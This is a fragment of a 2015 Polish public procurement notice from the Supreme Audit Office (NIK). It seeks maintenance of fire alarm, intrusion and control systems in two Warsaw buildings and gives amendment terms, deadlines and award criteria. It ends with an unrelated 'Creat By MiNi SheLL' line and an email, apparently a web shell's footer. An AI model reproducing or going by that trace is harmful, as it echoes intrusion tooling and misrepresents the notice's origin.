2. Zamawiający przewiduje zmiany w zawartej Umowie w stosunku do treści oferty dotyczące wartości umowy w następujących przypadkach:<br>
1) zmiany stawki podatku od towarów i usług,<br>
2) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br>
3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.nik.gov.pl/zamowienia-publiczne/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Najwyższa Izba Kontroli, Warszawa, ul. Filtrowa 57, pokój 1028.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2015 godzina 12:00, miejsce: Warszawa, ul. Filtrowa 57, pok. nr 17 - Sekretariat Biura Gospodarczego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeglądy techniczne i konserwacje elektronicznych systemów bezpieczeństwa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przeglądy techniczne, konserwacje instalacji i urządzeń elektronicznych systemów bezpieczeństwa znajdujących się w budynku biurowym A Najwyższej Izby Kontroli w Warszawie przy ul. Filtrowej 57:<br>
a) systemu technicznego zabezpieczenia przeciwpożarowego w budynku biurowym o powierzchni użytkowej ok. 16.000 m,2 w tym systemu sygnalizacji pożaru AlgoRex  wraz z układami oddymiania oraz układami wykonawczymi takimi jak centrale i trzymacze drzwiowe, centrale oddymiania, siłowniki i klapy oddymiające oraz elementy oddzieleń przeciwpożarowych będących urządzeniami przeciwpożarowymi, dźwiękowego systemu ostrzegawczego (DSO), instalacji oświetlenia awaryjnego i ewakuacyjnego,<br>
b) systemu sygnalizacji włamania i napadu CS 440,<br>
c) systemu kontroli nadrzędnej LMS.<br>
2. Termin wykonania zamówienia: od dnia 1 stycznia 2016 r. do dnia 31 grudnia 2018 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2, 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji Wykonawcy na otrzymane zgłoszenie obsługi awaryjnej - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeglądy techniczne i konserwacje instalacji i urządzeń elektronicznych systemów bezpieczeństwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przeglądy techniczne, konserwacje urządzeń systemu technicznego zabezpieczenia przeciwpożarowego znajdujących się w budynku biurowym B Najwyższej Izby Kontroli  w Warszawie przy ul. Krzywickiego 9 o powierzchni użytkowej ok. 7.000 m2, tj. systemu sygnalizacji pożaru IQ8 firmy Esser, klap odymiających oraz elementów oddzieleń przeciwpożarowych będących urządzeniami przeciwpożarowymi, dźwiękowego systemu ostrzegawczego (DSO), instalacji oświetlenia awaryjnego i ewakuacyjnego.<br>
2. Termin wykonania zamówienia: od dnia 16 września 2015 r. do dnia 31 grudnia 2018 r. z wyjątkiem dźwiękowego systemu ostrzegawczego (DSO) od dnia 13 grudnia 2015 r. do dnia 31 grudnia 2018 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2, 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji Wykonawcy na otrzymane zgłoszenie obsługi awaryjnej - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com